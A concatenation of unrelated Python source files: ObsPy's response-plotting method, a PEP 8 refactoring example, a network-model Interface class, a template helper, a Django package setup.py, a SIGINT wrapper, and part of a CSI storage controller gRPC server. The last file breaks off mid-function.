            will not be displayed interactively. The given path/file name is
            also used to automatically determine the output format. Supported
            file formats depend on your matplotlib backend. Most backends
            support png, pdf, ps, eps and svg. Defaults to ``None``.
        .. rubric:: Basic Usage
        >>> from obspy import read_inventory
        >>> inv = read_inventory()
        >>> inv.plot_response(0.001, station="RJOB")  # doctest: +SKIP
        .. plot::
            from obspy import read_inventory
            inv = read_inventory()
            inv.plot_response(0.001, station="RJOB")
        """
        import matplotlib.pyplot as plt
        # Reuse caller-supplied axes if given; otherwise build a fresh
        # two-row figure (amplitude on top, phase below, sharing the x axis).
        if axes is not None:
            ax1, ax2 = axes
            fig = ax1.figure
        else:
            fig = plt.figure()
            ax1 = fig.add_subplot(211)
            ax2 = fig.add_subplot(212, sharex=ax1)
        # Narrow the inventory to the requested subset before plotting.
        matching = self.select(network=network, station=station,
                               location=location, channel=channel, time=time,
                               starttime=starttime, endtime=endtime)
        # Overlay every matching channel response on the shared axes pair;
        # channels that cannot be plotted are skipped with a warning so one
        # bad response does not abort the whole figure.
        for net in matching.networks:
            for sta in net.stations:
                for cha in sta.channels:
                    try:
                        cha.plot(min_freq=min_freq, output=output,
                                 axes=(ax1, ax2),
                                 label=".".join((net.code, sta.code,
                                                 cha.location_code, cha.code)),
                                 unwrap_phase=unwrap_phase,
                                 plot_degrees=plot_degrees, show=False,
                                 outfile=None)
                    except ZeroSamplingRate:
                        msg = ("Skipping plot of channel with zero "
                               "sampling rate:\n%s")
                        warnings.warn(msg % str(cha), UserWarning)
                    except ObsPyException as e:
                        msg = "Skipping plot of channel (%s):\n%s"
                        warnings.warn(msg % (str(e), str(cha)), UserWarning)
        # final adjustments to plot if we created the figure in here
        if axes is None:
            from obspy.core.inventory.response import _adjust_bode_plot_figure
            _adjust_bode_plot_figure(fig, plot_degrees, show=False)
        # outfile takes precedence over interactive display.
        if outfile:
            fig.savefig(outfile)
        else:
            if show:
                plt.show()
        return fig
if __name__ == '__main__':
    # Run this module's doctests when executed as a script.
    import doctest
    doctest.testmod(exclude_empty=True)
|
# Credits to Raymond Hettinger - Beyond PEP 8
import jnettool.tools.elements.NetworkElement
import jnettool.tools.Routing
import jnettool.tools.RouteInspector

# Fix: the module is named 'jnettool'; the previous 'jnnettool' (double n)
# typo would raise NameError at runtime.
ne = jnettool.tools.elements.NetworkElement('171.0.2.45')
"""
In some ways there is nothing wrong with this code.
It works and it's readable.
On the other hand, the code at the bottom is profoundly better.
Code at the top would pass most people's coding standards; it would get checked in,
it would live for a long time, other people would copy that style, and we would congratulate
ourselves for being "compliant".
What is wrong is "ignoring the Gorilla"
Recommendations:
* avoid unnecessary packaging in favor of simple imports -> probably solved by using the * import (e.g. import java.lang.*)
* Custom Exceptions -> allows putting a name to the problem
* properties instead of getters -> this is not available in java, but we have @Getter and/or @Accessors(fluent=true)
or simply define a routingTable() method
"""
# Old-style version: Java-flavored getters, index-based iteration, and a
# custom exception type surfaced directly to the caller.
try:
    routing_table = ne.getRoutingTable()
except jnettool.tools.elements.MissingVar:
    # No routing table: log and undo any partial work on the element.
    logging.exception('No routing table found')
    ne.cleanup('rollback')
else:
    # Walk the table by index and print one "name -> ip" line per route.
    num_routes = routing_table.getSize()
    for RToffset in range(num_routes):
        route = routing_table.getRouteByIndex(RToffset)
        name = route.getName()
        ipaddr = route.getIPAddr()
        print("%15s -> %s" % (name, ipaddr))
finally:
    # Commit and disconnect regardless of success or failure above.
    ne.cleanup('commit')
    ne.disconnect()
#################################
from nettools import NetworkElement
# Pythonic version: the context manager owns connect/commit/disconnect and
# the routing table is a plain iterable of route objects with attributes.
with NetworkElement('171.0.2.45') as ne:
    for route in ne.routing_table:
        print("%15s -> %s" % (route.name, route.ipaddr))
|
"""An object representing a Node interface"""
from .rsvp import RSVP_LSP
from .exceptions import ModelException
class Interface(object):
    """An object representing a Node interface.

    :param name: interface name
    :param cost: routing metric for the interface (non-negative int/float)
    :param capacity: interface capacity (non-negative int/float)
    :param node_object: local Node object the interface belongs to
    :param remote_node_object: Node object on the far end of the interface
    :param address: address shared by the two interfaces of a circuit
    """

    def __init__(self, name, cost, capacity, node_object, remote_node_object,
                 address=0):
        self.name = name
        self.cost = cost
        self.capacity = capacity
        self.node_object = node_object
        self.remote_node_object = remote_node_object
        self.address = address
        self.traffic = 0.0  # egress traffic currently carried
        self._failed = False
        self.reserved_bandwidth = 0  # bandwidth reserved by RSVP LSPs

        # Validate cost and capacity values (zero is allowed by the check)
        if not isinstance(cost, (int, float)) or cost < 0:
            raise ValueError('Cost must be positive integer or float')
        if not isinstance(capacity, (int, float)) or capacity < 0:
            raise ValueError('Capacity must be positive integer or float')

    @property
    def _key(self):
        """Unique ID for interface object"""
        return (self.name, self.node_object.name)

    # Modify the __hash__ and __eq__ methods to make comparisons easier
    def __eq__(self, other_object):
        if not isinstance(other_object, Interface):
            return NotImplemented
        return [self.node_object, self.remote_node_object, self.name,
                self.capacity, self.address] == [other_object.node_object,
                other_object.remote_node_object, other_object.name,
                other_object.capacity, other_object.address]

    def __hash__(self):
        # Fix: hashing self.__dict__ made the hash depend on mutable state
        # (traffic, _failed, reserved_bandwidth) and on 'cost', which __eq__
        # ignores -- breaking the __eq__/__hash__ contract and set/dict
        # membership after mutation.  Hash only immutable identity fields
        # that are a subset of the fields __eq__ compares, so equal objects
        # always hash equally.
        return hash((self.name, self.capacity, self.address))

    def __repr__(self):
        # The backslash continuation is inside the literal, so the rendered
        # repr is a single line with no embedded newline.
        return '%s(name = %r, cost = %s, capacity = %s, node_object = %r, \
remote_node_object = %r, address = %r)' % (self.__class__.__name__,
                                           self.name,
                                           self.cost,
                                           self.capacity,
                                           self.node_object,
                                           self.remote_node_object,
                                           self.address)

    @property
    def reservable_bandwidth(self):
        """Amount of bandwidth available for rsvp lsp reservation"""
        return self.capacity - self.reserved_bandwidth

    @property
    def failed(self):
        """Whether the interface is currently failed."""
        return self._failed

    @failed.setter
    def failed(self, status):
        if not isinstance(status, bool):
            raise ModelException('must be boolean value')
        if status is False:
            # An interface can only be un-failed when BOTH endpoint nodes
            # are up; otherwise it stays failed.
            if self.node_object.failed is False and \
                    self.remote_node_object.failed is False:
                self._failed = False
            else:
                self._failed = True
        else:
            self._failed = True

    def fail_interface(self, model):
        """
        Fails this interface and its remote counterpart in the model.
        """
        # find the remote interface
        remote_interface = Interface.get_remote_interface(self, model)
        # set the 2 interfaces to failed = True
        self.failed = True
        remote_interface.failed = True

    def unfail_interface(self, model):
        """
        Un-fails this interface and its remote counterpart.

        Raises ModelException if either endpoint node is failed, since an
        unfailed interface cannot live on a failed node.
        """
        # find the remote interface
        remote_interface = Interface.get_remote_interface(self, model)
        # check to see if the local and remote node are failed
        if self.node_object.failed is False and \
                self.remote_node_object.failed is False:
            # set the 2 interfaces to failed = False
            self.failed = False
            remote_interface.failed = False
        else:
            message = "Local and/or remote node are failed; cannot have unfailed interface on failed node"
            raise ModelException(message)

    def get_remote_interface(self, model):
        """Searches the model and returns the remote interface.

        Raises ModelException if no remote interface exists or if the
        local/remote pairing fails the sanity check.
        """
        remote_interface = None
        for interface in model.interface_objects:
            if interface.node_object.name == self.remote_node_object.name \
                    and interface.address == self.address:
                remote_interface = interface
                break
        # Fix: previously a missing match fell through to an unbound local
        # variable (NameError); fail explicitly with a model error instead.
        if remote_interface is None:
            message = 'No remote interface found for {!r}'.format(self)
            raise ModelException(message)
        # sanity check: the remote side must reference the same node pairing
        if remote_interface.remote_node_object.interfaces(model) == \
                self.node_object.interfaces(model):
            return remote_interface
        # Fix: the previous code assigned a tuple to 'message' instead of a
        # formatted string.
        message = ('Internal Validation Error: {!r} and {!r} fail validation '
                   'checks'.format(remote_interface, self))
        raise ModelException(message)

    def get_circuit_object(self, model):
        """
        Returns the circuit object from the model that an
        interface is associated with.
        """
        ckt = model.get_circuit_object_from_interface(self.name,
                                                      self.node_object.name)
        return ckt

    def demands(self, model):
        """Returns list of demands that egress the interface"""
        dmd_list = []
        for demand in model.demand_objects:
            for demand_path in demand.path:
                # If demand_path is an RSVP LSP, look at the LSP path
                if isinstance(demand_path, RSVP_LSP):
                    # NOTE(review): appends the LSP's demands, which may
                    # duplicate entries already in dmd_list -- preserved
                    # as-is from the original behavior.
                    for dmd in demand_path.demands_on_lsp(model):
                        dmd_list.append(dmd)
                # If demand_path is not an LSP, look for self in demand_path
                elif self in demand_path:
                    dmd_list.append(demand)
        return dmd_list

    @property
    def utilization(self):
        """Returns utilization = (self.traffic/self.capacity)*100% """
        if self.traffic == 'Down':
            return 'Int is down'
        else:
            # NOTE(review): raises ZeroDivisionError for capacity == 0,
            # which the constructor permits -- confirm intended.
            return self.traffic / self.capacity
|
import re
# Fix: 'reduce' is no longer a builtin in Python 3; without this import the
# template function raised NameError on first call.
from functools import reduce

# Matches "{{name}}" placeholders made of ASCII letters.
REGEX = re.compile(r'\{\{([a-zA-Z]+)\}\}')
# Escape double braces down to the single braces str.format expects.
REPLS = ('{{', '{'), ('}}', '}')


def create_template(s):
    """Return a template function for *s*.

    Placeholders look like ``{{name}}`` and are filled from keyword
    arguments; placeholders with no matching keyword render as ''.
    """
    def my_template(**kwargs):
        # Default every placeholder to '' so .format never raises KeyError.
        keys = {match.group(1): '' for match in REGEX.finditer(s)}
        keys.update(kwargs)
        rendered = reduce(lambda acc, repl: acc.replace(*repl), REPLS, s)
        return rendered.format(**keys)
    return my_template
|
#!/usr/bin/env python
"""Packaging script for django-follow."""
from setuptools import setup, find_packages

import follow

# Read the long description inside a context manager so the file handle is
# closed deterministically (open(...).read() inline leaked the handle).
with open('README.rst') as readme_file:
    long_description = readme_file.read()

setup(
    name='django-follow',
    description='Application which enables following features for users. Can be used for contact books or whatnot',
    long_description=long_description,
    packages=find_packages(),
    author='Alen Mujezinovic',
    author_email='alen@caffeinehit.com',
    url='https://github.com/caffeinehit/django-follow',
    include_package_data=True,
    package_data={'follow': ['templates/follow/*html']},
    zip_safe=False,
    # Single-source the version from the package itself.
    version=follow.__version__,
)
|
#!/usr/bin/env python3
"""Wrapper that runs another command and reports SIGINT preemption."""
import signal
import subprocess
import sys


def signal_handler(sig, frame):
    """On SIGINT, announce preemption and exit with status 2."""
    print('PREEMPTED')
    sys.exit(2)


# Fix: the guard previously compared against "main", so it never ran.
if __name__ == "__main__":
    # Setup signal handler
    signal.signal(signal.SIGINT, signal_handler)
    # Launch the wrapped command (argv[1:]); sys.argv[0] is this wrapper
    # itself, so passing the full argv would re-run the wrapper recursively.
    result = subprocess.run(sys.argv[1:], capture_output=True)
    # Propagate the child's exit status to our caller.
    sys.exit(result.returncode)
|
import os.path
import time
from concurrent import futures
from argparse import ArgumentParser
import grpc
import yaml
from retry import retry
import controller.array_action.errors as array_errors
import controller.controller_server.config as config
import controller.controller_server.utils as utils
from controller.array_action import messages
from controller.array_action.storage_agent import get_agent, detect_array_type
from controller.common import settings
from controller.common.csi_logger import get_stdout_logger, set_log_level
from controller.common.node_info import NodeIdInfo
from controller.common.utils import set_current_thread_name
from controller.controller_server.errors import ObjectIdError, ValidationException
from controller.controller_server.exception_handler import handle_common_exceptions, handle_exception, \
build_error_response
from controller.controller_server import messages as controller_messages
from controller.csi_general import csi_pb2
from controller.csi_general import csi_pb2_grpc
logger = get_stdout_logger()
class ControllerServicer(csi_pb2_grpc.ControllerServicer):
"""
gRPC server for Digestor Service
"""
def __init__(self, array_endpoint):
self.endpoint = array_endpoint
my_path = os.path.abspath(os.path.dirname(__file__))
path = os.path.join(my_path, "../../common/config.yaml")
with open(path, 'r') as yamlfile:
self.cfg = yaml.safe_load(yamlfile) # TODO: add the following when possible : Loader=yaml.FullLoader)
    @handle_common_exceptions(csi_pb2.CreateVolumeResponse)
    def CreateVolume(self, request, context):
        """gRPC CreateVolume: find or create a volume, optionally copying
        data from a source volume or snapshot.

        Returns a CreateVolumeResponse, or an error response with the
        matching gRPC status code on validation/array errors.
        """
        set_current_thread_name(request.name)
        logger.info("create volume")
        try:
            utils.validate_create_volume_request(request)
        except ObjectIdError as ex:
            return handle_exception(ex, context, grpc.StatusCode.NOT_FOUND,
                                    csi_pb2.CreateVolumeResponse)
        logger.debug("volume name : {}".format(request.name))
        # source_type/source_id identify the snapshot or volume to clone
        # from (falsy when this is a plain create).
        source_type, source_id = self._get_source_type_and_id(request)
        logger.debug("Source {0} id : {1}".format(source_type, source_id))
        topologies = utils.get_volume_topologies(request)
        secrets = request.secrets
        try:
            array_connection_info = utils.get_array_connection_info_from_secrets(
                secrets=secrets,
                topologies=topologies)
            volume_parameters = utils.get_volume_parameters(parameters=request.parameters,
                                                            system_id=array_connection_info.system_id)
            pool = volume_parameters.pool
            if not pool:
                raise ValidationException(controller_messages.pool_should_not_be_empty_message)
            space_efficiency = volume_parameters.space_efficiency
            # TODO : pass multiple array addresses
            array_type = detect_array_type(array_connection_info.array_addresses)
            with get_agent(array_connection_info, array_type).get_mediator() as array_mediator:
                logger.debug(array_mediator)
                volume_final_name = self._get_volume_final_name(volume_parameters, request.name, array_mediator)
                required_bytes = request.capacity_range.required_bytes
                max_size = array_mediator.maximal_volume_size_in_bytes
                min_size = array_mediator.minimal_volume_size_in_bytes
                if required_bytes > max_size:
                    message = messages.SizeOutOfRangeError_message.format(required_bytes, max_size)
                    return build_error_response(message, context, grpc.StatusCode.OUT_OF_RANGE,
                                                csi_pb2.CreateVolumeResponse)
                # CSI permits a zero-byte request; fall back to the array's
                # minimum volume size.
                if required_bytes == 0:
                    required_bytes = min_size
                    logger.debug("requested size is 0 so the default size will be used : {0} ".format(
                        required_bytes))
                try:
                    volume = array_mediator.get_volume(
                        volume_final_name,
                        pool=pool,
                    )
                except array_errors.ObjectNotFoundError:
                    logger.debug(
                        "volume was not found. creating a new volume with parameters: {0}".format(request.parameters))
                    array_mediator.validate_supported_space_efficiency(space_efficiency)
                    volume = array_mediator.create_volume(volume_final_name, required_bytes, space_efficiency,
                                                          pool)
                else:
                    # Volume already exists: run idempotency checks before
                    # reusing it.
                    logger.debug("volume found : {}".format(volume))
                    if not source_id and volume.capacity_bytes != request.capacity_range.required_bytes:
                        message = "Volume was already created with different size."
                        return build_error_response(message, context, grpc.StatusCode.ALREADY_EXISTS,
                                                    csi_pb2.CreateVolumeResponse)
                    copy_source_res = self._handle_existing_volume_source(volume, source_id, source_type,
                                                                          array_connection_info.system_id,
                                                                          context)
                    if copy_source_res:
                        return copy_source_res
                if source_id:
                    # Copy the requested source's data into the volume.
                    self._copy_to_existing_volume_from_source(volume, source_id,
                                                              source_type, required_bytes,
                                                              array_mediator)
                    volume.copy_source_id = source_id
                res = utils.generate_csi_create_volume_response(volume, array_connection_info.system_id, source_type)
                logger.info("finished create volume")
                return res
        except array_errors.InvalidArgumentError as ex:
            return handle_exception(ex, context, grpc.StatusCode.INVALID_ARGUMENT, csi_pb2.CreateVolumeResponse)
        except array_errors.VolumeAlreadyExists as ex:
            return handle_exception(ex, context, grpc.StatusCode.ALREADY_EXISTS, csi_pb2.CreateVolumeResponse)
    def _copy_to_existing_volume_from_source(self, volume, source_id, source_type,
                                             minimum_volume_size, array_mediator):
        """Copy data from a source volume/snapshot into *volume*.

        On any failure the freshly created target volume is rolled back
        (deleted) and the exception is re-raised to the caller.
        """
        volume_id = volume.id
        try:
            source_object = array_mediator.get_object_by_id(source_id, source_type)
            if not source_object:
                # Source vanished: undo the target volume before failing.
                self._rollback_create_volume_from_source(array_mediator, volume.id)
                raise array_errors.ObjectNotFoundError(source_id)
            source_capacity = source_object.capacity_bytes
            logger.debug("Copy {0} {1} data to volume {2}.".format(source_type, source_id, volume_id))
            array_mediator.copy_to_existing_volume_from_source(volume_id, source_id,
                                                               source_capacity, minimum_volume_size)
            logger.debug("Copy volume from {0} finished".format(source_type))
        except array_errors.ObjectNotFoundError as ex:
            logger.error("Volume not found while copying {0} data to volume".format(source_type))
            logger.exception(ex)
            self._rollback_create_volume_from_source(array_mediator, volume.id)
            raise ex
        except Exception as ex:
            # Broad catch is deliberate: any copy failure must trigger the
            # rollback; the original exception is re-raised afterwards.
            logger.error("Exception raised while copying {0} data to volume".format(source_type))
            self._rollback_create_volume_from_source(array_mediator, volume.id)
            raise ex
    @retry(Exception, tries=5, delay=1)
    def _rollback_create_volume_from_source(self, array_mediator, volume_id):
        """Best-effort cleanup: delete the volume created for a failed copy.

        Retried up to 5 times (1s delay) because a failed rollback would
        leak the volume on the array.
        """
        logger.debug("Rollback copy volume from source. Deleting volume {0}".format(volume_id))
        array_mediator.delete_volume(volume_id)
def _handle_existing_volume_source(self, volume, source_id, source_type, system_id, context):
"""
Args:
volume : volume fetched or created in CreateVolume
source_id : id of object we should copy to volume or None if volume should not be copied
source_type: : the object type of the source - volume or snapshot
context : CreateVolume response context
Returns:
If volume exists and is a copy of specified object - set context status to OK
and return CreateVolumeResponse.
If volume is a copy of another source - set context status to INTERNAL and return CreateVolumeResponse.
In any other case return None.
"""
volume_name = volume.name
volume_copy_source_id = volume.copy_source_id
if not source_id and not volume_copy_source_id:
return None
if volume_copy_source_id == source_id:
return self._handle_volume_exists_with_same_source(context, source_id, source_type, volume_name, volume,
system_id)
return self._handle_volume_exists_with_different_source(context, source_id, source_type, volume_name)
def _handle_volume_exists_with_same_source(self, context, source_id, source_type, volume_name, volume, system_id):
logger.debug(
"Volume {0} exists and it is a copy of {1} {2}.".format(volume_name, source_type, source_id))
context.set_code(grpc.StatusCode.OK)
return utils.generate_csi_create_volume_response(volume, system_id, source_type)
def _handle_volume_exists_with_different_source(self, context, source_id, source_type, volume_name):
logger.debug(
"Volume {0} exists but it is not a copy of {1} {2}.".format(volume_name, source_type, source_id))
message = "Volume already exists but it was created from a different source."
return build_error_response(message, context, grpc.StatusCode.ALREADY_EXISTS, csi_pb2.CreateVolumeResponse)
    @handle_common_exceptions(csi_pb2.DeleteVolumeResponse)
    def DeleteVolume(self, request, context):
        """gRPC DeleteVolume: delete a volume by id.

        Idempotent: a malformed id or an already-deleted volume still
        yields a successful DeleteVolumeResponse.
        """
        set_current_thread_name(request.volume_id)
        logger.info("DeleteVolume")
        secrets = request.secrets
        utils.validate_delete_volume_request(request)
        try:
            volume_id_info = utils.get_volume_id_info(request.volume_id)
        except ObjectIdError as ex:
            # Malformed id means nothing to delete; succeed for idempotency.
            logger.warning("volume id is invalid. error : {}".format(ex))
            return csi_pb2.DeleteVolumeResponse()
        system_id = volume_id_info.system_id
        array_type = volume_id_info.array_type
        volume_id = volume_id_info.object_id
        array_connection_info = utils.get_array_connection_info_from_secrets(secrets, system_id=system_id)
        with get_agent(array_connection_info, array_type).get_mediator() as array_mediator:
            logger.debug(array_mediator)
            try:
                logger.debug("Deleting volume {0}".format(volume_id))
                array_mediator.delete_volume(volume_id)
            except array_errors.ObjectNotFoundError as ex:
                # Already gone -- treat as success (idempotent delete).
                logger.debug("volume was not found during deletion: {0}".format(ex))
            except array_errors.PermissionDeniedError as ex:
                return handle_exception(ex, context, grpc.StatusCode.PERMISSION_DENIED,
                                        csi_pb2.DeleteVolumeResponse)
        logger.debug("generating delete volume response")
        res = csi_pb2.DeleteVolumeResponse()
        logger.info("finished DeleteVolume")
        return res
    @handle_common_exceptions(csi_pb2.ControllerPublishVolumeResponse)
    def ControllerPublishVolume(self, request, context):
        """gRPC ControllerPublishVolume: map a volume to a node's initiators.

        Array-level mapping failures are translated to the matching gRPC
        status codes (FAILED_PRECONDITION, RESOURCE_EXHAUSTED, NOT_FOUND,
        INVALID_ARGUMENT).
        """
        set_current_thread_name(request.volume_id)
        logger.info("ControllerPublishVolume")
        utils.validate_publish_volume_request(request)
        try:
            volume_id_info = utils.get_volume_id_info(request.volume_id)
            system_id = volume_id_info.system_id
            array_type = volume_id_info.array_type
            volume_id = volume_id_info.object_id
            node_id_info = NodeIdInfo(request.node_id)
            node_name = node_id_info.node_name
            initiators = node_id_info.initiators
            logger.debug("node name for this publish operation is : {0}".format(node_name))
            array_connection_info = utils.get_array_connection_info_from_secrets(request.secrets, system_id=system_id)
            with get_agent(array_connection_info, array_type).get_mediator() as array_mediator:
                lun, connectivity_type, array_initiators = array_mediator.map_volume_by_initiators(volume_id,
                                                                                                   initiators)
            logger.info("finished ControllerPublishVolume")
            res = utils.generate_csi_publish_volume_response(lun,
                                                             connectivity_type,
                                                             self.cfg,
                                                             array_initiators)
            return res
        except array_errors.VolumeMappedToMultipleHostsError as ex:
            return handle_exception(ex, context, grpc.StatusCode.FAILED_PRECONDITION,
                                    csi_pb2.ControllerPublishVolumeResponse)
        except (array_errors.LunAlreadyInUseError, array_errors.NoAvailableLunError) as ex:
            return handle_exception(ex, context, grpc.StatusCode.RESOURCE_EXHAUSTED,
                                    csi_pb2.ControllerPublishVolumeResponse)
        except (array_errors.NoIscsiTargetsFoundError, ObjectIdError) as ex:
            return handle_exception(ex, context, grpc.StatusCode.NOT_FOUND, csi_pb2.ControllerPublishVolumeResponse)
        except array_errors.UnsupportedConnectivityTypeError as ex:
            return handle_exception(ex, context, grpc.StatusCode.INVALID_ARGUMENT,
                                    csi_pb2.ControllerPublishVolumeResponse)
@handle_common_exceptions(csi_pb2.ControllerUnpublishVolumeResponse)
def ControllerUnpublishVolume(self, request, context):
set_current_thread_name(request.volume_id)
logger.info("ControllerUnpublishVolume")
utils.validate_unpublish_volume_request(request)
try:
volume_id_info = utils.get_volume_id_info(request.volume_id)
system_id = volume_id_info.system_id
array_type = volume_id_info.array_type
volume_id = volume_id_info.object_id
node_id_info = NodeIdInfo(request.node_id)
node_name = node_id_info.node_name
initiators = node_id_info.initiators
logger.debug("node name for this unpublish operation is : {0}".format(node_name))
array_connection_info = utils.get_array_connection_info_from_secrets(request.secrets,
system_id=system_id)
with get_agent(array_connection_info, array_type).get_mediator() as array_mediator:
array_mediator.unmap_volume_by_initiators(volume_id, initiators)
logger.info("finished ControllerUnpublishVolume")
return csi_pb2.ControllerUnpublishVolumeResponse()
except ObjectIdError as ex:
return handle_exception(ex, context, grpc.StatusCode.INVALID_ARGUMENT,
array_errors.VolumeAlreadyUnmappedError)
except array_errors.VolumeAlreadyUnmappedError:
logger.debug("Idempotent case. volume is already unmapped.")
return csi_pb2.ControllerUnpublishVolumeResponse()
except array_errors.ObjectNotFoundError:
logger.debug("Idempotent case. volume is already deleted.")
return csi_pb2.ControllerUnpublishVolumeResponse()
    @handle_common_exceptions(csi_pb2.ValidateVolumeCapabilitiesResponse)
    def ValidateVolumeCapabilities(self, request, context):
        """Not implemented by this driver."""
        logger.info("ValidateVolumeCapabilities")
        raise NotImplementedError()
    @handle_common_exceptions(csi_pb2.ListVolumesResponse)
    def ListVolumes(self, request, context):
        """Not implemented by this driver."""
        logger.info("ListVolumes")
        raise NotImplementedError()
    @handle_common_exceptions(csi_pb2.CreateSnapshotResponse)
    def CreateSnapshot(self, request, context):
        """gRPC CreateSnapshot: find or create a snapshot of a volume.

        Idempotent: an existing snapshot of the same source volume is
        returned as success; a name clash with a snapshot of a different
        volume is an ALREADY_EXISTS error.
        """
        set_current_thread_name(request.name)
        logger.info("Create snapshot")
        utils.validate_create_snapshot_request(request)
        source_volume_id = request.source_volume_id
        logger.info("Snapshot base name : {}. Source volume id : {}".format(request.name, source_volume_id))
        secrets = request.secrets
        try:
            volume_id_info = utils.get_volume_id_info(source_volume_id)
            system_id = volume_id_info.system_id
            array_type = volume_id_info.array_type
            volume_id = volume_id_info.object_id
            array_connection_info = utils.get_array_connection_info_from_secrets(secrets, system_id=system_id)
            snapshot_parameters = utils.get_snapshot_parameters(parameters=request.parameters,
                                                                system_id=array_connection_info.system_id)
            pool = snapshot_parameters.pool
            with get_agent(array_connection_info, array_type).get_mediator() as array_mediator:
                logger.debug(array_mediator)
                snapshot_final_name = self._get_snapshot_final_name(snapshot_parameters, request.name, array_mediator)
                logger.info("Snapshot name : {}. Volume id : {}".format(snapshot_final_name, volume_id))
                snapshot = array_mediator.get_snapshot(
                    volume_id,
                    snapshot_final_name,
                    pool=pool
                )
                if snapshot:
                    # Same name but a different source volume is a conflict.
                    if snapshot.source_volume_id != volume_id:
                        message = messages.SnapshotWrongVolumeError_message.format(snapshot_final_name,
                                                                                   snapshot.source_volume_id,
                                                                                   volume_id)
                        return build_error_response(message, context, grpc.StatusCode.ALREADY_EXISTS,
                                                    csi_pb2.CreateSnapshotResponse)
                else:
                    logger.debug(
                        "Snapshot doesn't exist. Creating a new snapshot {0} from volume {1}".format(
                            snapshot_final_name,
                            volume_id))
                    snapshot = array_mediator.create_snapshot(volume_id, snapshot_final_name, pool)
                logger.debug("generating create snapshot response")
                res = utils.generate_csi_create_snapshot_response(snapshot, source_volume_id)
                logger.info("finished create snapshot")
                return res
        except (ObjectIdError, array_errors.SnapshotSourcePoolMismatch) as ex:
            return handle_exception(ex, context, grpc.StatusCode.INVALID_ARGUMENT,
                                    csi_pb2.CreateSnapshotResponse)
        except array_errors.SnapshotAlreadyExists as ex:
            return handle_exception(ex, context, grpc.StatusCode.ALREADY_EXISTS,
                                    csi_pb2.CreateSnapshotResponse)
    @handle_common_exceptions(csi_pb2.DeleteSnapshotResponse)
    def DeleteSnapshot(self, request, context):
        """gRPC DeleteSnapshot: delete a snapshot by id (idempotent)."""
        set_current_thread_name(request.snapshot_id)
        logger.info("Delete snapshot")
        secrets = request.secrets
        utils.validate_delete_snapshot_request(request)
        try:
            try:
                snapshot_id_info = utils.get_snapshot_id_info(request.snapshot_id)
            except ObjectIdError as ex:
                # Malformed id means nothing to delete; succeed for
                # idempotency.
                logger.warning("Snapshot id is invalid. error : {}".format(ex))
                return csi_pb2.DeleteSnapshotResponse()
            system_id = snapshot_id_info.system_id
            array_type = snapshot_id_info.array_type
            snapshot_id = snapshot_id_info.object_id
            array_connection_info = utils.get_array_connection_info_from_secrets(secrets, system_id=system_id)
            with get_agent(array_connection_info, array_type).get_mediator() as array_mediator:
                logger.debug(array_mediator)
                try:
                    array_mediator.delete_snapshot(snapshot_id)
                except array_errors.ObjectNotFoundError as ex:
                    # Already gone -- treat as success (idempotent delete).
                    logger.debug("Snapshot was not found during deletion: {0}".format(ex))
        except array_errors.ObjectNotFoundError as ex:
            # NOTE(review): delete_snapshot's ObjectNotFoundError is already
            # handled by the inner except above, so this outer handler only
            # fires for other calls (e.g. get_mediator). It relies on a
            # '.message' attribute, which builtin exceptions do not have in
            # Python 3 -- confirm the project exception defines it.
            logger.debug("snapshot was not found during deletion: {0}".format(ex.message))
            context.set_code(grpc.StatusCode.OK)
            return csi_pb2.DeleteSnapshotResponse()
        logger.debug("generating delete snapshot response")
        res = csi_pb2.DeleteSnapshotResponse()
        logger.info("finished DeleteSnapshot")
        return res
    @handle_common_exceptions(csi_pb2.GetCapacityResponse)
    def GetCapacity(self, request, context):
        """Not implemented by this driver."""
        logger.info("GetCapacity")
        raise NotImplementedError()
    @handle_common_exceptions(csi_pb2.ControllerExpandVolumeResponse)
    def ControllerExpandVolume(self, request, context):
        """gRPC ControllerExpandVolume: grow a volume to the requested size.

        Idempotent: a volume already at (or above) the requested size
        returns success without touching the array.
        """
        set_current_thread_name(request.volume_id)
        logger.info("ControllerExpandVolume")
        secrets = request.secrets
        utils.validate_expand_volume_request(request)
        try:
            volume_id_info = utils.get_volume_id_info(request.volume_id)
        except ObjectIdError as ex:
            return handle_exception(ex, context, grpc.StatusCode.INVALID_ARGUMENT,
                                    csi_pb2.ControllerExpandVolumeResponse)
        try:
            system_id = volume_id_info.system_id
            array_type = volume_id_info.array_type
            volume_id = volume_id_info.object_id
            array_connection_info = utils.get_array_connection_info_from_secrets(secrets, system_id=system_id)
            with get_agent(array_connection_info, array_type).get_mediator() as array_mediator:
                logger.debug(array_mediator)
                required_bytes = request.capacity_range.required_bytes
                max_size = array_mediator.maximal_volume_size_in_bytes
                volume_before_expand = array_mediator.get_object_by_id(volume_id, config.VOLUME_TYPE_NAME)
                if not volume_before_expand:
                    raise array_errors.ObjectNotFoundError(volume_id)
                # Already large enough: succeed without expanding.
                if volume_before_expand.capacity_bytes >= required_bytes:
                    context.set_code(grpc.StatusCode.OK)
                    return utils.generate_csi_expand_volume_response(volume_before_expand.capacity_bytes,
                                                                     node_expansion_required=False)
                if required_bytes > max_size:
                    message = messages.SizeOutOfRangeError_message.format(required_bytes, max_size)
                    return build_error_response(message, context, grpc.StatusCode.OUT_OF_RANGE,
                                                csi_pb2.ControllerExpandVolumeResponse)
                logger.debug("expanding volume {0}".format(volume_id))
                array_mediator.expand_volume(
                    volume_id=volume_id,
                    required_bytes=required_bytes)
                # Re-read the volume so the response reports the actual
                # post-expand capacity.
                volume_after_expand = array_mediator.get_object_by_id(volume_id, config.VOLUME_TYPE_NAME)
                if not volume_after_expand:
                    raise array_errors.ObjectNotFoundError(volume_id)
                res = utils.generate_csi_expand_volume_response(volume_after_expand.capacity_bytes)
                logger.info("finished expanding volume")
                return res
        except array_errors.NotEnoughSpaceInPool as ex:
            return handle_exception(ex, context, grpc.StatusCode.RESOURCE_EXHAUSTED,
                                    csi_pb2.ControllerExpandVolumeResponse)
def ControllerGetCapabilities(self, request, context):
logger.info("ControllerGetCapabilities")
types = csi_pb2.ControllerServiceCapability.RPC.Type
res = csi_pb2.ControllerGetCapabilitiesResponse(
capabilities=[csi_pb2.ControllerServiceCapability(
rpc=csi_pb2.ControllerServiceCapability.RPC(type=types.Value("CREATE_DELETE_VOLUME"))),
csi_pb2.ControllerServiceCapability(
rpc=csi_pb2.ControllerServiceCapability.RPC(type=types.Value("CREATE_DELETE_SNAPSHOT"))),
csi_pb2.ControllerServiceCapability(
rpc=csi_pb2.ControllerServiceCapability.RPC(type=types.Value("PUBLISH_UNPUBLISH_VOLUME"))),
csi_pb2.ControllerServiceCapability(
rpc=csi_pb2.ControllerServiceCapability.RPC(type=types.Value("CLONE_VOLUME"))),
